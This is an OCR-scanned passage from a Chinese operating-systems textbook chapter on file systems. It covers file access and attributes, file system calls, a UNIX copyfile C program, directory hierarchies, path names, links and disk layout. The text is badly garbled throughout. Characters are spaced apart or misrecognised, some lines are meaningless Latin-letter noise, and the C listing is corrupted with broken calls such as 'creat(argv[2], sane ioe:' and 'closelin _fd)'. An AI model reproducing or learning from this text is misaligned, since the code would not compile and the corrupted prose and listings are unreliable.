的 文件 以 .dat 类 型 输出 。 如 有 果 用 户 试图 用 C 编 译 器 来 编译 这 个 文件 ， 因 
为 文件 扩展 名 不 对 ，C 编 译 器 会 拒绝 编译 。 若 想 把 fe.dat 复 制 到 file.c 也 
不 行 ， 因 为 系统 会 认为 这 是 无 效 的 复制 (防止 用 户 错误 ) 。 


尽管 对 初学 着 而 言 ， 这 类 “保护 "是 有 利 的 ， 但 一 些 有 经 验 的 用 户 
却 感到 很 烦恼 ， 因 为 他 们 要 人 花 很 多 精力 来 适应 操作 系统 对 合理 和 不 合 
理 操作 的 划分 。 


4.1.4 文件 存 取 


早期 操作 系统 只 有 一 种 文件 存 取 方 式 ， 顺序 存 取 (sequential 
access) 。 进程 在 这 些 系 统 中 可 从 头 顺 序 读 取 文件 的 全 部 字 市 或 记 
录 ， 但 不 能 跳 过 某 一 些 内 容 ， 也 不 能 不 按 顺 序 读 取 。 顺 序 存 取 文 件 古 
可 以 返回 到 起 点 的 ， 需 要 时 可 多 次 读 取 该 文件 。 在 存储 介质 十 磁 市 而 
不 是 磁盘 时 ， 顺 序 存 取 文 件 是 很 方便 的 。 


当 用 磁盘 来 存储 文件 时 ， 我 们 可 以 不 按 顺序 地 读 取 文件 中 的 字 节 
或 记录 ， 或 者 按照 关键 字 而 不 是 位 置 来 存 取 记 录 。 这 种 能 够 以 任何 次 
序 读 取 其 中 字 节 或 记录 的 文件 称 作 随机 存 取 文 件 (random access 
file) 。 许 多 应 用 程序 需要 这 种 类 型 的 文件 。 


随机 存 取 文件 对 很 多 应 用 程序 而 言 是 必 不 可 少 的 ， 如 数据 库 系 
统 。 如 采 乘 客 打 电 话 预 订 某 航班 机 票 ， 订 票 程序 必须 能 直接 存 取 该 航 
班 记录 ， 而 不 必 先 读 出 其 他 航班 的 成 和 十 上 万 个 记录 。 


有 两 种 方法 可 以 指示 从 何 处 开始 读 取 文件 。 一 种 是 每 次 read 操 作 
都 给 出 开始 读 文 件 的 位 置 。 另 一 种 是 用 一 个 特殊 的 seek 操 作 设置 当前 
位 置 ， 在 seek 操 作 后 ， 从 这 个 当前 位 置 顺序 地 开始 读 文 件 。UNIX 和 
Windows 使 用 的 是 后 一 种 方法 。 


4.1.5 文件 属性 


文件 都 有 文件 名 和 数据 。 另 外 ， 所 有 的 操作 系统 还 会 保存 其 他 与 
文件 相关 的 信息 ， 如 文件 创建 的 日 期 和 时 间 、 文 件 大 小 等 。 这 些 附加 
信息 称 为 文件 属性 (attribute) ， 有 些 人 称 之 为 元 数据 (metadata) ° 
文件 的 属性 在 不 同系 统 中 差别 很 大 。 一 些 音 用 的 属性 在 图 4-4 中 列 出 ， 
但 还 存在 其 他 的 属性 。 没 有 一 个 系统 具有 所 有 这 些 属性 ， 但 每 种 属性 
都 在 菜 种 系统 中 采用 。 


谁 可 以 存 取 文 件 ， 以 什么 方式 存 取 文 件 
0 表示 读 / 写 ;1 表示 只 读 
0 表示 正常 ;1 表示 不 在 列表 中 显示 
0 表示 普通 文件 ，1 表 示 系 统 文 件 
0 表示 已 经 备份 ; 1 表示 需要 备份 
ASCII/ 二 进 制 标志 | 0 表示 ASCII 码 文件 ，1 表 示 二 进 制 文件 
0 表示 正常 ;1 表示 进程 退出 时 删除 该 文件 
0 表示 未 加 锁 ， 非 零 表 示 加 锁 
一 个 记录 中 的 字 节 数 
键 字 段 的 字 节 数 
创建 时 间 文件 创建 的 日 期 和 时 间 
最 后 一 次 存 取 时 间 


当前 大 小 文件 的 字 节 数 
最 大 长 度 SCPE HY REK Bl AY A Z 


Al 44 一 些 常用 的 文件 属性 


前 4 个 属性 与 文件 保护 相关 ， 它 们 指出 了 谁 可 以 存 取 这 个 文件 ， 谁 
不 能 存 取 这 个 文件 。 有 各 种 不 同 的 文件 保护 方案 ， 其 中 一 些 保护 方案 
以 后 会 讨论 。 在 一 些 系 统 中 ， 用 户 必 须 给 出 口令 才能 存 取 文件 。 此 
时 ， 口 令 也 必须 是 文件 属性 之 一 。 


标志 是 一 些 位 或 短 的 字段 ， 用 于 控制 或 后 用 某 些 特殊 属性 。 例 
如 ， 隐 藏 文件 不 在 文件 列表 中 出 现 。 存 档 标志 位 用 于 记录 文件 是 否 备 
份 过 ， 由 备份 程序 清除 该 标志 位 ; 者 文件 被 修改 ， 操 作 系 统 则 设置 该 
标志 位 。 用 这 种 方法 ， 备 份 程序 可 以 知道 哪些 文件 需要 备份 。 临 时 标 
志 表 明 当 创建 该 文件 的 进程 终止 时 ， 文 件 会 被 自动 删除 。 


记录 长 度 、 键 的 位 置 和 键 的 长 度 等 字段 只 能 出 现在 用 关键 字 查 找 
记录 的 文件 里 ， 它 们 提供 了 查找 关键 字 所 需 的 信息 。 


时 间 字 段 记录 了 文件 的 创建 时 间 、 最 近 一 次 存 取 时 间 以 及 最 后 一 
次 修改 时 间 ， 它 们 的 作用 不 同 。 例 如 ， 目 标 文 件 生成 后 被 修改 的 源 文 
件 需 要 重新 编译 生成 目标 文件 。 这 些 字段 提供 了 必要 的 信息 。 


当前 大 小 字段 指出 了 当前 的 文件 大 小 。 在 一 些 老 式 大 型 机 操作 系 
统 中 创建 文件 时 ， 要 给 出 文件 的 最 大 长 度 ， 以 便 操 作 系统 事 先 按 最 大 
长 度 留 出 存储 空间 。 工 作 站 和 和 个 人 计算 机 中 的 操作 系统 则 聪明 多 
了 ， 不 需要 这 一 总 提示 。 


41.6 ”文件 操作 


使 用 文件 的 目的 是 存储 信息 并 方便 以 后 的 检索 。 对 于 存储 和 检 
索 ， 不 同系 统 提 供 了 不 同 的 操作 。 以 下 古 与 文件 有 关 的 最 常用 的 一 些 
系统 调用 : 


1)create。 创 建 不 包含 任何 数据 的 文件 。 该 调用 的 目的 是 表示 文件 
即将 建立 ， 并 设置 文件 的 一 些 属 性 。 


2)delete。 当 不 再 需要 某 个 文件 时 ， 必 须 删 除 该 文件 以 释放 磁盘 衬 
间 。 任 何 文件 系统 总 有 一 个 系统 调用 用 来 删除 文件 。 


3)open。 在 使 用 文件 之 前 ， 必 须 先 打开 文件 。open 调 用 的 目的 
: 把 文件 属性 和 磁盘 地 址 表 装 入 内 存 ， 便 于 后 续 调 用 的 快速 存 取 。 


alu 


A)close ° FFG Ra, BROCE AMEE UE, IA DIX 
关闭 文 件 以 释放 内 部 表 空 间 。 很 多 系统 限制 进程 打开 文件 的 个 数 ， 以 
吾 励 用 户 关 闭 不 再 使 用 的 文件 。 磁 副 以 块 为 单位 写 入 ， 关 闭 文件 时 ， 
写 入 该 文件 的 最 后 一 块 ， 即 使 这 个 块 还 没有 满 。 


5)read。 在 文件 中 读 取 数据 。 一 般 地 ， 读 出 数据 来 目 文件 的 当前 
位 置 。 调 用 者 必须 指明 需要 读 取 多 少数 据 ， 并 且 提 供 存 放 这 些 数 据 的 
缓冲 区 。 


6)write。 回 文件 写 数据 ， 写 操作 一 般 也 是 从 文件 当前 位 置 开 始 。 
如 有 果 当 前 位 置 是 文件 末尾 ， 文 件 长 度 增 加 。 如 采 当 前 位 置 在 文件 中 
间 ， 则 现 有 数据 被 履 兰 ， 并 且 永 远 丢 失 。 


7)append。 此 调用 是 write 的 限制 形式 ， 它 只 能 在 文件 末尾 添加 数 
据 。 帮 系统 只 提供 最 小 系统 调用 集合 ， 则 通常 没有 append。 很 多 系统 


对 同一 操作 提供 了 多 种 实现 方法 ， 这 些 系统 中 有 时 有 append 调 用 。 


8)seek。 对 于 随机 存 取 文件 ， 要 指定 从 何 处 开始 取 数 据 ， 通 常 的 
方法 是 用 seek 系 统 调用 把 当前 位 置 指针 指向 文件 中 特定 位 置 。seek 调 
用 结束 后 ， 殊 可 以 从 该 位 置 开 始 读 写 数据 了 。 


9)get attributes。 进 程 运行 常 需 要 读 取 文件 属性 。 例 如 ，UNIX 中 
make 程 序 通 常用 于 管理 由 多 个 源 文 件 组 成 的 软件 开发 项 目 。 在 调用 
make 时 ， 检 查 全 部 源 文件 和 目标 文件 的 修改 时 间 ， 实 现 最 小 编译 ， 使 
得 全 部 文件 都 为 最 新 版 本 。 为 达到 此 目的 ， 需 要 查找 文件 的 某 一 些 属 
性 ， 特 别 是 修改 时 间 。 


10)set attributes。 某 些 属 性 是 可 由 用 户 设置 的 ， 在 文件 创建 之 后 ， 
用 户 还 可 以 通过 系统 调用 set attributes 来 修改 它们 。 保 护 模式 信息 是 一 
个 显著 的 例子 ， 大 多 数 标志 也 属于 此 类 属性 。 


11)rename。 用 户 常常 要 改变 已 有 文件 的 名 字 ，rename 系 统 调 用 用 
于 这 一 目的 。 严 格 地 说 ， 设 置 这 个 系统 调用 不 是 十 分 必要 的 ， 因 为 可 


以 先 把 文件 复制 到 一 个 新 文件 名 的 文件 中 ， 然 后 删除 原来 的 文件 。 


4.1.7 使 用 文件 系统 调用 的 一 个 示例 程序 


本 市 会 考察 一 个 简单 的 UNIX 程 序 ， 它 把 文件 从 源 文件 处 复制 到 目 
标 文 件 处 。 程 序 清 单 如 图 4-5 所 示 “。 该 程序 的 功能 很 简单 ， 甚 至 没有 考 
虑 出 错 报 告 处 理 ， 但 它 给 出 了 有 关 文 件 的 系统 调用 是 怎样 工作 的 一 般 
思路 。 


例如 ， 通 过 下 面 的 命令 行 可 以 调用 程序 copyfile: 


copyfile abc xyz 


把 文件 abc 复 制 到 xyz。 如 果 xyz 已 经 存在 ，abc 会 覆盖 它 。 否 则 ， 就 
创建 它 。 程 序 调用 必须 提供 两 个 参数 ， 它 们 都 是 合法 的 文件 名 。 第 一 
个 是 源 文件 ， 第 二 个 是 输出 文件 。 


在 程序 的 开头 古 四 个 ##include 语 句 ， 它 们 把 大 量 的 定义 和 画 数 原型 
包含 在 这 个 程序 。 为 了 使 程序 遵守 相应 的 国际 标准 ， 这 些 是 需要 的 ， 
无 须 作 进一步 的 讨论 。 接 下 来 一 行 是 main 函 数 的 原型 ， 这 是 ANSI CH 
必需 的 ， 但 对 我 们 的 目的 而 言 ， 它 也 不 是 重点 。 


接 下 来 的 第 一 个 #define 语 句 是 一 个 宏 定义 ， 它 把 BUF_SIZE 字 符 串 
定义 为 一 个 宏 ， 其 数值 为 4096。 程 序 会 读 写 若干 个 有 4096 个 字 节 的 
块 。 类 似 地 ， 给 常数 一 个 名 称 而 且 用 这 一 名 称 代 替 常 数 是 一 种 良好 的 


编程 习惯 。 这 样 的 习惯 不 仅 使 程序 易 读 ， 而 且 使 程序 易于 维护 。 第 二 
个 #define 语 句 决 定 谁 可 以 访问 输出 文件 。 


主 程序 名 为 main， 它 有 两 个 参数 : argc 和 argv。 当 调用 这 个 程序 
时 ， 操 作 系 统 提供 这 两 个 参数 。 第 一 个 参数 表示 在 调用 该 程序 的 命令 
行 中 包含 多 少 个 字符 串 ， 包 括 该 程序 名 。 它 应 该 是 3。 第 二 个 参数 是 指 
向 程序 参数 的 指针 数组 。 在 上 面 的 示例 程序 中 ， 这 一 数组 的 元 素 应 该 
包含 指向 下 列 值 的 指针 : 


argv[0]="copyfile" 
argv[1]="abc" 
argv[2]="xyz" 


正 是 通过 这 个 数组 ， 程 序 访问 其 参数 。 


声明 了 五 个 变量 。 前 面 两 个 (in_fd 和 out_fd) 用 来 保存 文件 描述 
符 ， 即 打开 一 个 文件 时 返回 一 个 小 整数 。 后 面 两 个 (rd_count 和 
wt_count) 分 别 是 由 read 和 write 系 统 调用 所 返回 的 字 市 计数 。 最 后 一 个 
(buffer) 是 用 于 保存 所 读 出 的 数据 以 及 提供 写 入 数据 的 缓冲 区 。 


第 一 行 实际 语句 检查 argc， 看 它 是 否 是 3。 如果 不是 ， 它 以 状态 码 1 
退出 。 任 何 非 0 的 状态 码 均 表示 出 错 。 在 本 程序 中 ， 状 态 码 是 惟一 的 出 
背 报告 处 理 。 一 个 程序 的 产品 版 通常 会 打印 出 错 信 息 。 


接着 我 们 试图 打开 源 文件 并 创建 目标 文件 。 如 果 源 文件 成 功 打 
开 ， 系 统 会 给 jn_fd 赋 予 一 个 小 的 整数 ， 用 以 标识 源 文 件 。 后 续 的 调用 
必须 引用 这 个 整数 ， 使 系统 知道 需要 的 是 哪 一 个 文件 。 类 似 地 ， 如 果 
目标 文件 也 成 功 地 创建 了 ，out_fd 会 被 赋予 一 个 标识 用 的 值 。create 的 
第 二 个 变量 是 设置 保护 模式 。 如 果 打 开 或 创建 文件 失败 ， 对 应 的 文件 
描述 符 被 设 为 -1， 程 序 带 着 出 错 码 退出 。 


接 下 来 是 用 来 复制 文件 的 循环 。 一 开始 试图 读 出 4KB 数 据 到 buffer 
中 。 它 通过 调用 库 过 程 read 来 完成 这 项 工作 ， 该 过 程 实际 激活 了 read 系 
统 调用 。 第 一 个 参数 标识 文件 ， 第 二 个 参数 指定 缓冲 区 ， 第 三 个 参数 
指定 读 出 多 少 字 节 。 赋 予 rd_count 的 字数 是 实际 所 读 出 的 字 下 数 。 通 
常 这 个 数 是 4096， 除 非 文件 中 只 有 人 少量 字 节 。 当 到 达 文 件 尾部 时 ， 该 
参数 的 值 是 0。 如 末 rd_count 是 零 或 人 负数， 复制 工作 束 不 能 再 进行 下 
去 ， 所 以 执行 break 语 句 ， 用 以 中 断 循 环 (否则 就 无 法 结束 了 ) 。 


调用 write 把 缓冲 区 的 内 容 输出 到 目标 文件 中 去 。 第 一 个 参数 标识 
文件 ， 第 二 个 参数 指定 缓冲 区 ， 第 三 个 参数 指定 写 入 多 少 字 节 ， 同 read 
类 似 。 注 意 字 节 计数 是 实际 读 出 的 字 记 数 ， 不 是 BUF_SIZE。 这 一 点 是 
很 重要 的 ， 因 为 最 后 一 个 缓冲 区 一 般 不 会 是 4096， 除 非 文 件 长 度 磁 巧 
是 4KB 的 倍数 。 


当 整 个 文件 处 理 完 时 ， 超 出 文件 尾部 的 首次 调用 会 把 0 值 返回 给 
rd_count， 这 样 ， 程 序 会 退出 循环 。 此 时 ， 关 闭 两 个 文件 ， 程 序 退出 并 


附 有 正常 完成 的 状态 码 。 


尽管 Windows 的 系统 调用 与 UNIX 的 系统 调用 不 同 ， 但 是 Windows 
程序 复制 文件 的 命令 行 的 一 般 结构 与 图 4-5 中 的 相当 类 似 。 我 们 将 在 第 
11 章 中 考察 Windows Vista 的 系统 调用 。 


诺 复 制 文件 程序 ， 有 基本 的 错误 检查 和 错误 报告 */ 

#include <sys/types.h> 访 包 括 必 要 的 头 文 件 */ 
#include <fentl.h> 

#include <stdlib.h> 

#include <unistd.h> 

int main(int argc, char *argv[]); /* ANSI AY */ 


#define BUF_SIZE 4096 上 # 使 用 一 个 4096 字 节 大 小 的 缓冲 区 */ 
#define OUTPUT_MODE 0700 请 输出 文件 的 保护 位 */ 


int main(int argc, char *argv[]) 


int in_fd, out_fd, rd_count, wt_count; 
char buffer[BUF _ SIZE]; 


if (argc != 3) exit(1); /* 如 果 argc 不 等 于 3， 语 法 错 */ 
1 打开 输入 文件 并 创建 输出 文件 */ 


in_fd = open(argv[1], O_RDONLY); m hae aioe 
if (in_fd < 0) exit(2); 起 文人 
out_fd = creat(argv[2], sane ioe: /* 创建 目 peas 件 */ 


if (out_fd < 0) exit(3); /* 如 果 该 文件 不 能 被 创建 ， 退 出 7 


能 打开 ， 退 出 */ 


循环 复制 */ 

while (TRUE) { 
rd_count = read(in_fd, buffer, BUF_SIZE); /* 读 一 块 数据 */ 

if (rd_count <= 0) break; PWC PEAR BIEN HH, HH */ 
wt_count = write(out_fd, buffer, rd_count); /* 写 数 据 */ 
if (wt_count <= 0) exit(4); /* wt count <=0 是 一 个 错误 */ 

) 


岩 关 闭 文件 */ 
closelin _fd); 


close(out_fd); a 
if (rd_count == 0) 上 没有 读 取 错误 */ 


exit(0); 
else 


exit(5); /* APR RE */ 


图 45 复制 文件 的 一 个 简单 程序 


4.2 HX 


MFA Sti He fe kB RBC IPRA ICR ME, ERS ASH H 
AAS the SCTE ° ANTI TE Boe > HERRAR > HRR EA BY DAT 
目 孙 进行 的 操作 ° 


4.2.1 一 级 日 好 系统 


目 孙 系统 的 最 简单 形式 是 在 一 个 目 永 中 包含 所 有 的 文件 。 这 有 时 
称 为 根 目 录 ， 但 是 由 于 只 有 一 个 目录 ， 所 以 其 名 称 并 不 重要 。 在 早期 
的 个 人 计算 机 中 ， 这 种 系统 很 普 届 ， 部 分 原因 征 因为 只 有 一 个 用 户 。 
有 趣 的 是 ， 世 界 第 一 台 超 级 计算 机 CDC 6600 对 于 所 有 的 文件 也 只 有 一 
个 目录 ， 尽 管 该 机 絮 同 时 被 许多 用 户 使 用 。 这 样 决策 无 疑问 是 为 了 
使 软件 设计 简单 。 


一 个 单 层 目录 系 统 的 例子 如 图 4-6 所 示 。 该 目录 中 有 四 个 文件 。 这 
一 设计 的 优点 在 于 简单 ， 并 且 能 够 快速 定位 文件 一 一 事实 上 只 有 一 个 
WHREA Xt ERAS Til BRAS EP, AE 
话 、 数 码 相机 以 及 一 些 便携 式 音 乐 播 放 船 等 。 


46 含有 四 个 文件 的 单 层 目 永 系统 


4.22 层次 日 杂 系 统 


对 于 简单 的 特殊 应 用 而 言 ， 单 层 目 录 是 合适 的 ( 单 层 目录 甚至 用 
在 了 第 一 代 个 人 计算 机 中 ) ， 但 是 现在 的 用 户 有 着 成 千 的 文件 ， 如 果 
所 有 的 文件 都 在 一 个 目录 中 ， 寻 找 文 件 束 几乎 不 可 能 了 。 这 样 ， 束 需 
要 有 一 种 方式 将 相关 的 文件 组 合 在 一 起 。 例 如 ， 某 个 教授 可 能 有 一 些 
文件 ， 第 一 组 文件 是 为 了 一 门 课程 而 写作 的 ， 第 二 组 文件 包含 了 学 生 
为 另 一 门 课程 所 提交 的 程序 ， 第 三 组 文件 是 他 构造 的 一 个 高 级 编译 - 写 
作 系 统 的 代码 ， 而 第 四 组 文件 是 奖学金 建议 书 ， 还 有 其 他 与 电子 邮 
件 、 短 会 、 正 在 写作 的 文章 、 游 戏 等 有 关 的 文件 。 


这 里 所 需要 的 是 层次 结构 ( 即 ， 一 个 目录 树 ) 。 通 过 这 种 方式 ， 
可 以 用 很 多 目录 把 文件 以 目 然 的 方式 分 组 。 进 而 ， 如 末 多 个 用 户 分 至 
同一 个 文件 服务 器 ， 如 许多 公司 的 网 络 系统 ， 每 个 用 户 可 以 为 目 己 的 
目录 树 拥有 目 己 的 私人 和 根 目录 。 这 种 方式 如 图 4-7 所 示 ， 其 中 ， 根 目录 
含有 有 目录 A、B 和 C， 分别 属 于 不 同 用 户 ， 其 中 有 两 个 用 户 为 他 们 的 项 
目 创建 了 子 目录 。 


图 47 层次 目录 系统 


用 户 可 以 创建 任意 数量 的 子 目 未 ， 这 种 能 力 为 用 户 组 织 其 工作 提 
供 了 强大 的 结构 化 工具 。 因 此 ， 几 乎 所 有 现代 文件 系统 都 是 用 这 个 方 
式 组 织 的 。 


4.2.3 BEY 


用 目录 树 组 织 文 件 系 统 时 ， 需 要 有 某 种 方法 指明 文件 名 。 常 用 的 
方法 有 两 种 。 第 一 种 是 ， 每 个 文件 都 赋予 一 个 绝对 路 径 名 (absolute 
pathname) ， 它 由 从 根 目 录 到 文件 的 路 径 组 成 。 例 如 ， 路 
径 /usr/ast/mailbox 表 示 根 目录 中 有 子 目 录 usr， 而 usr 中 又 有 子 目 如 ast， 
文件 mailbox 就 在 子 目录 ast 下。 绝对 路 径 名 一 定 从 根 目录 开始 ， 且 是 惟 
一 的 。 在 UNIX 中 ， 路 径 各 部 分 之 间 用 “分 隔 。 在 Windows 中 ， 分 隔 符 
是 “。 在 MULTICS 中 是 “>”。 这 样 在 这 三 个 系统 中 同样 的 路 径 名 按 如 
下 形式 写成 : 


Windows \usr\ast\mailbox 
UNIX /usr/ast/mailbox 
MULTICS  >usr>ast>mailbox 


NER FARR TE, UPR ERE BEE EB FE, MA 


OS BER EET BATE © 


另 一 种 指定 文件 名 的 方法 是 使 用 相对 路 径 名 (relative path 
name) 。 它 常 和 工作 目录 (working directory) ” (也 称 作 当前 目录 
(current directory) ) 一 起 使 用 。 用 户 可 以 指定 一 个 目录 作为 当前 工作 
日 隶 。 这 时 ， 所 有 的 不 从 根 上 日 录 开 始 的 路 径 名 都 是 相对 于 工作 目录 


的 。 例 如 ， 如 果 当 前 的 工作 目录 是 /asrvast， 则 绝对 路 径 名 
为 /usrastVymailbox 的 文件 可 以 直接 用 mailbox 来 引用 。 也 就 是 说 ， 如 果 工 
作 目 孙 是 /usrvast， 则 UNIX 命 令 


cp/usr/ast/mailbox/usr/ast/mailbox.bak 


和 命令 


cp mailbox mailbox.bak 


具有 相同 的 含义 。 相 对 路 径 往往 更 方便 ， 而 它 实现 的 功能 和 绝对 
路 径 完全 相同 。 


一 些 程序 需要 存 取 某 个 特定 文件 ， 而 不 论 当前 目录 是 什么 。 这 
时 ， 应 该 采用 绝对 路 径 名 。 比 如 ， 一 个 检查 拼写 的 程序 要 读 文 
件 /usr/lib/dictionary， 因 为 它 不 可 能 事先 知道 当前 目录 ， 所 以 束 采 用 完 
整 的 绝对 路 径 名 。 不 论 当 前 的 工作 目 孙 是 什么 ， 绝 对 路 径 名 总 能 正常 
工作 。 


当然 ， 若 这 个 检查 拼写 的 程序 要 从 目录 /ustlib 中 读 很 多 文件 ， 可 以 
用 男 一 种 方法 ， 即 执行 一 个 系统 调用 把 该 程序 的 工作 目录 切换 
到 /usrvlib， 然 后 只 需 用 dictionary 作 为 open 的 第 一 个 参数 。 通 过 显 式 地 改 
变 工作 目录 ， 可 以 知道 该 程序 在 目录 树 中 的 确切 位 置 ， 进 而 可 以 采用 
相对 路 径 名 。 


每 个 进程 都 有 日 己 的 工作 目 隶 ， 这 样 在 进程 改变 工作 目录 并 退出 
后 ， 其 他 进程 不 会 受到 影响 ， 文 件 系统 中 也 不 会 有 改变 的 凑 迹 。 对 进 
程 而 言 ， 切 换 工 作 目 录 是 安全 的 ， 所 以 只 要 需要 ， 就 可 以 改变 当前 工 
作 目 录 。 但 是 ， 如 果 改 变 了 库 过 程 的 工作 目录 ， 并 且 工 作 完 毕 之 后 没 
有 修改 回去 ， 则 其 他 程序 有 可 能 无 法 正常 运行 ， 因 为 它们 关于 当前 目 
孙 的 假设 已 经 失效 。 所 以 库 过 程 很 少 改 变 工 作 目 孙 ， 者 非 改 不 可 ， 必 
定 要 在 返回 之 前 改 回 到 原 有 的 工作 目录 。 


文 持 层 次 目录 结构 的 大 多 数 操作 系统 在 每 个 目录 中 有 两 个 特殊 的 
目 永 项“.” 和 “.…”， 利 读 作 “dot>” 和 “dotdot”。dot 指 当前 目 了 永 ，dotdot 指 其 
父 目录 (在 根 目 录 中 例外 ， 根 目录 中 它 指向 自己 ) 。 要 了 解 怎 样 使 用 
它们 ， 请 考虑 图 4-8 中 的 UNIX 目 录 树 。 一 个 进程 的 工作 目录 是 /usr/ast， 
它 可 采用 “..” 沿 树 向 上。 例如， 可 用 命令 


cp../lib/dictionary. 


把 文件 usr/lib/dictionary 复 制 到 上 自己 的 目录 下 。 第 一 个 路 径 告 诉 系 
3 EW (到 usr 目 录 ) ， 然 后 向 下 到 ]ib 目 录 ， 找 到 dictionary 文 件 。 


bin 


—— /usr/jim 


l 


图 4-8 UNIXH $H 


第 二 个 参数 (.) 指定 当前 目录 。 当 cp 命令 用 目录 名 (包括 “.”) 作 
为 最 后 一 个 参数 时 ， 则 把 全 部 的 文件 复制 到 该 目录 中 。 当 然 ， 对 于 上 
述 复制 ， 键 入 


cp/usr/lib/dictionary. 


we EAS FAA 7 1G o Fk BORA.” BY Da BEA PA dictionary ° 


无 论 如 何 ， 键 入 


cp/usr/lib/dictionary dictionary 


HAE CVE, WRA 


cp/usr/lib/dictionary/usr/ast/dictionary 


一 样 。 所 有 这 些 命令 都 完成 同样 的 工作 。 


A24 ”目录 操作 


不 同系 统 中 管理 目录 的 系统 调用 的 差别 比 管理 文件 的 系统 调用 的 
差别 大 。 为 了 了 解 这 些 系统 调用 有 哪些 及 它们 怎样 工作 ， 下 面 给 出 一 
个 例子 ( 取 自 UNIX) 。 


1)create。 创 建 目录 。 除 了 目录 项 “.” 和 “..” 外 ， 目 录 内 容 为 空 。 目 
录 项 “.” 和 “..” 是 系统 自动 放 在 目录 中 的 (有 了 时 通过 mkdir 程 序 完 成 ) 。 


2)delete。 删 除 目 未 。 只 有 择 目 了 永 可 删除 。 只 包含 目 永 
项 “” 和 “..” 的 目录 被 认 为 是 空 目 录 ， 这 两 个 目 孙 项 通常 不 能 删除 。 


3)opendir。 目 录 内 容 可 被 读 取 。 例 如 ， 为 列 出 目 邓 中 全 部 文件 ， 
程序 必须 先 打 开 该 目录 ， 然 后 读 其 中 全 部 文件 的 文件 名 。 与 打开 和 读 
文件 相同 ， 在 读 目 录 前 ， 必 须 打 开 目 录 。 


4)closedir。 读 目录 结束 后 ， 应 关闭 目录 以 释放 内 部 表 空 间 。 


5)readdir。 系 统 调用 readdir 返 回 打 开 目 录 的 下 一 个 目录 项 。 以 前 也 
采用 read 系 统 调用 来 读 目 录 ， 但 这 方法 有 一 个 缺点 : 程序 员 必须 了 解 
和 处 理 目录 的 内 部 结构 。 相 反 ， 不 论 采 用 哪 一 种 目录 结构 ，readdir 总 
是 以 标准 格式 返回 一 个 目录 项 。 


6)rename ° 在 很 多 方面 目录 和 文件 部 相 似 。 文 件 可 换 名 ， 目 录 也 
可 以 。 


7)link。 连 接 技 术 人 允许 在 多 个 目录 中 出 现 同一 个 文件 。 这 个 系统 调 
用 指定 一 个 存在 的 文件 和 一 个 路 径 名 ， 并 建立 从 该 文件 到 路 径 所 指名 
字 的 连 授 。 这 样 ， 可 以 在 多 个 目录 中 出 现 同 一 个 文件 。 这 种 类 型 的 连 
接 ， 增 加 了 该 文件 的 节点 (i-node) 计数 器 的 计数 (记录 含有 该 文件 
的 目录 项 数目 ) ， 有 时 称 为 硬 连接 (hard link) ° 


8)unlink。 删 除 目 未 项 。 如 采 被 解除 连接 的 文件 只 出 现在 一 个 目 永 
中 〈 通 常情 况 ) ， 则 将 它 从 文件 系统 中 删除 。 如 果 它 出 现在 多 个 目录 
中 ， 则 只 删除 指定 路 径 名 的 连接 ， 依 然 保 留 其 他 路 径 名 的 连接 。 在 
UNIX 中 ， 用 于 删除 文件 的 系统 调用 (前 面 已 有 论述 ) Sein Eee 


unlink ° 


最 主要 的 系统 调用 已 在 上 面 列 出 ， 但 还 有 其 他 一 些 调用 ， 如 与 目 
了 永 相关 的 管理 保护 信息 的 系统 调用 。 


关于 连接 文件 的 一 种 不 同 想法 十 符号 连接 。 不 同 于 使 用 两 个 文件 
名 指向 同一 个 内 部 数据 结构 来 代表 一 个 文件 ， 所 建立 的 文件 名 指 问 了 
命名 男 一 个 文件 的 小 文件 。 当 使 用 第 一 个 文件 时 ， 例 如 打开 时 ， 文 件 
系统 沿 着 路 径 ， 找 到 在 末端 的 名 字 。 然 后 它 使 用 该 新 名 字 局 动 查 找 进 


程 。 符 号 连接 的 优点 在 于 它 能 够 跨越 磁盘 的 界限 ， 甚 至 可 以 命名 在 远 
程 计算 机 上 的 文件 ， 不 过 符号 连接 的 实现 并 不 如 人 硬 连 接 那 样 有 效率 。 


4.3 文件 系统 的 实现 


现在 从 用 户 角 度 转 到 实现 者 角度 来 考察 文件 系统 。 用 户 关 心 的 是 
文件 是 怎样 命名 的 、 可 以 进行 哪些 操作 、 目 录 树 十 什么 样 的 以 及 类 似 
的 界面 问题 。 而 实现 者 感 兴趣 的 是 文件 和 目录 是 怎样 存储 的 、 磁 盘 空 
间 古 怎样 管理 的 以 及 起 样 使 系统 有 效 而 可 靠 地 工作 等 。 在 下 面 几 市 
中 ， 我 们 会 考察 这 些 文件 系统 的 实现 中 出 现 的 问题 ， 并 讨论 怎样 解决 


这 些 问题 。 


4.3.1 ”文件 系统 布局 


文件 系统 存放 在 磁盘 上 “。 多 数 磁 副 划 分 为 一 个 或 多 个 分 区 ， 每 个 
分 区 中 有 一 个 独立 的 文件 系统 。 磁 盘 的 0 号 硬 区 称 为 主 引导 记录 
(Master Boot Record, MBR) ， 用 来 引导 计算 机 。 在 MBR 的 结尾 是 分 
区 表 。 该 表 给 出 了 每 个 分 区 的 起 始 和 结束 地 址 。 表 中 的 一 个 分 区 被 标 
记 为 活动 分 区 。 在 计算 机 被 引导 时 ，BIOS 读 入 并 执行 MBR。MBR 做 的 
第 一 件 事 是 确定 活动 分 区 ， 读 入 它 的 第 一 个 块 ， 称 为 引导 块 (boot 
block) ， 并 执行 之 。 引 导 块 中 的 程序 将 装载 该 分 区 中 的 操作 系统 。 闪 
统一 起 见 ， 每 个 分 区 都 从 一 个 启动 块 开始 ， 即 使 它 不 含有 一 个 可 启动 
的 操作 系统 。 不 过 ， 在 将 来 这 个 分 区 也 许 会 有 一 个 操作 系统 的 。 


除了 从 引导 块 开 始 之 外 ， 磁 盘 分 区 的 布局 是 随 着 文件 系统 的 不 同 
而 变化 的 。 文 件 系统 经 前 包含 有 如 岁 4-9 所 列 的 一 些 项 目 。 第 一 个 是 超 
级 块 (superblock) ， 超 级 块 包含 文件 系统 的 所 有 关键 参数 ， 在 计算 机 
局 动 时 ， 或 痢 在 该 文件 系统 百 次 使 用 时 ， 把 超级 块 读 入 内 存 。 超 级 块 
中 的 典型 信息 包括 : 确定 文件 系统 类 型 用 的 魔 数 、 文 件 系 统 中 数据 块 
的 数量 以 及 其 他 重要 的 管理 信息 。 


整个 磁盘 


图 4-9 一 个 可 能 的 文件 系统 布局 


接着 是 文件 系统 中 空闲 块 的 信息 ， 例 如 ， 可 以 用 位 图 或 指针 列表 
的 形式 给 出 。 后 面 也许 跟 随 的 是 一 组 证 点 ， 这 是 一 个 数据 结构 数组 ， 
每 个 文件 一 个 ， 证 点 说 明了 文件 的 方方面面 。 接 者 可 能 生根 目 孙 ， 它 
